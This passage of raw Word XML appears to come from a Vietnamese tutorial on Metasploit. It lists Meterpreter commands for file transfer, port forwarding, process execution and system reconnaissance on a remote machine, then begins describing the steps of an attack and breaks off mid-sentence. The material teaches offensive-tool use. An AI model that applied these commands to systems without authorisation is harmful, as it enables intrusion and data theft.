        <w:t>close channel_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00C41F08" w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Đóng channel mà</w:t>
      </w:r>
      <w:r w:rsidR="00D4209D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã kết nối với remote computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2CC540" w14:textId="0F9F625C" w:rsidR="00C41F08" w:rsidRPr="009613CB" w:rsidRDefault="00C41F08" w:rsidP="009613CB">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9613CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>interact channel_id:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bắt đầu một phiên làm việc với channel vừa thiết lập với remote machine</w:t>
      </w:r>
      <w:r w:rsidR="00A95946">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p>
    <w:p w14:paraId="04ACBAD0" w14:textId="77777777" w:rsidR="00D4209D"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initcrypt cipher [parameters]: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mã hoá dữ liệu được gửi giữa host và remote machine</w:t>
      </w:r>
      <w:r w:rsidR="00D4209D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D2BAA" w14:textId="71876FE9"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F0E869" w14:textId="73DD403E"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w:t>
      </w:r>
      <w:r w:rsidRPr="00D4209D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>module Fs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho phép upload và download files từ các remote machine</w:t>
      </w:r>
      <w:r w:rsidR="00D4209D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4F332C" w14:textId="53CD178D"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cd directory: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">giống lệnh cd của commandline </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1257B0AD" w14:textId="478DA235"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getcwd: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">cho biết thư mục đang làm việc hiện tại </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A903076" w14:textId="250715F6"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ls [filter_string]</w:t>
      </w:r>
      <w:r w:rsidR="00D4209D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4209D">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liệt kê các thư mục và tập tin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E7B989" w14:textId="525C5D96"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upload src1 [src2 ...] dst</w:t>
      </w:r>
      <w:r w:rsidR="00D4209D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">upload file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EAB372" w14:textId="026B6BE7"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download src1 [src2 ...] dst: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">download file  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF30C22" w14:textId="77777777" w:rsidR="00C41F08" w:rsidRPr="00D4209D" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4209D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng module Net: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56254785" w14:textId="77777777"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 xml:space="preserve">ipconfig </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F35AAFB" w14:textId="77777777" w:rsid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route</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC63501" w14:textId="77777777" w:rsidR="00D4209D" w:rsidRPr="00C41F08" w:rsidRDefault="00D4209D" w:rsidP="00D4209D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78ED4E13" w14:textId="6B90BD97" w:rsidR="00C41F08" w:rsidRPr="00C41F08" w:rsidRDefault="00D4209D" w:rsidP="00C41F08">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X</w:t>
      </w:r>
      <w:r w:rsidR="00C41F08" w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">em bảng định tuyến của remote machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF3FBF0" w14:textId="36C14E4B" w:rsidR="00C41F08" w:rsidRPr="00D4209D" w:rsidRDefault="00D4209D" w:rsidP="00D4209D">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portfwd [ -arv] [ -L laddr] [ -l lport] [ -h rhost] [ -p rport] [ -P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">]: </w:t>
      </w:r>
      <w:r w:rsidR="00C41F08" w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho phép tạo port forward giữa host và remote machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C41F08" w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E14F190"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3484172D"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module Process: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DB1C79" w14:textId="64BE4CF3" w:rsidR="00C41F08" w:rsidRPr="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00D4209D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>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execute -f file [ -a args] [ -Hc]</w:t>
      </w:r>
      <w:r w:rsidR="00D4209D" w:rsidRPr="00D4209D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> câu lệnh execute cho phép bạn tạo ra một process mới trên remote machine và sử dụng process đó để khai thác dữ liệu </w:t>
      </w:r>
      <w:r w:rsidR="00D4209D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC7FEBE" w14:textId="68DF73FE" w:rsidR="00C41F08" w:rsidRPr="00C41F08" w:rsidRDefault="00D4209D" w:rsidP="00D4209D">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4209D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>kill pid1 pid2 pid3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00C41F08" w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> huỷ những processes đang chạy trên máy remote machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C03BCE" w14:textId="7D8BA7D0"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ps: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> liệt kê những process của remote machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B1E333" w14:textId="77777777" w:rsidR="00D4209D" w:rsidRDefault="00D4209D" w:rsidP="00C41F08">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59C311DF" w14:textId="77777777" w:rsidR="00C41F08" w:rsidRPr="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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 xml:space="preserve">Sử dụng module Sys: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05620E87" w14:textId="4D1E25E8" w:rsidR="00C41F08" w:rsidRPr="00C41F08" w:rsidRDefault="00D4209D" w:rsidP="00D4209D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4209D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00C41F08" w:rsidRPr="00D4209D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>etuid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00C41F08" w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">biết username hiện tại của remote machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E97D8E" w14:textId="21E2BF5B" w:rsidR="00C41F08" w:rsidRPr="00D4209D" w:rsidRDefault="00C41F08" w:rsidP="00D4209D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D4209D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">sysinfo: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">cho biết thông tin về computername, OS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F1BEF5" w14:textId="77777777" w:rsidR="00021025" w:rsidRDefault="00021025" w:rsidP="00254EEB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445FC20D" w14:textId="0BD2968A" w:rsidR="00536A5A" w:rsidRDefault="00D83F08"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w:t>
      </w:r>
      <w:r w:rsidR="00BF1B5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00536A5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Các bước cơ bản của quá trình tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316F8B51" w14:textId="5AFC87FF" w:rsidR="00870C89" w:rsidRDefault="00536A5A" w:rsidP="00254EEB">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ước 1: Chọn 1 Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA25E5" w14:textId="77777777" w:rsidR="00536A5A" w:rsidRDefault="00536A5A" w:rsidP="00254EEB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073F9623" w14:textId="31C0ABD8" w:rsidR="00870C89" w:rsidRDefault="00536A5A" w:rsidP="00536A5A">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Nếu muốn xem tất cả các exploit có trong database của Metasploit thì gõ lệnh:</w:t>
      </w:r>
      <w:r w:rsidR="003B3A36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B3A36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>show exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478D5A01" w14:textId="77777777" w:rsidR="003B3A36" w:rsidRPr="003B3A36" w:rsidRDefault="003B3A36" w:rsidP="00536A5A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23939262" w14:textId="7A7CDEB2" w:rsidR="00536A5A" w:rsidRDefault="003B3A36" w:rsidP="00536A5A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3A36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23784C93" wp14:editId="702CED38">
            <wp:extent cx="5727700" cy="497205"/>
            <wp:effectExtent l="0" t="0" r="1270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97205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1113C308" w14:textId="77777777" w:rsidR="003B3A36" w:rsidRDefault="003B3A36" w:rsidP="00536A5A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E2DBD4F" w14:textId="748870C3" w:rsidR="003B3A36" w:rsidRDefault="003B3A36" w:rsidP="00536A5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Nó sẽ hiển thị gần như tất cả các exploit có trong database, còn nếu muốn kiếm một exploit thì Mestaploit cho phép tìm kiếm theo nhiều cách. Chẳng hạn như gõ lệnh: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
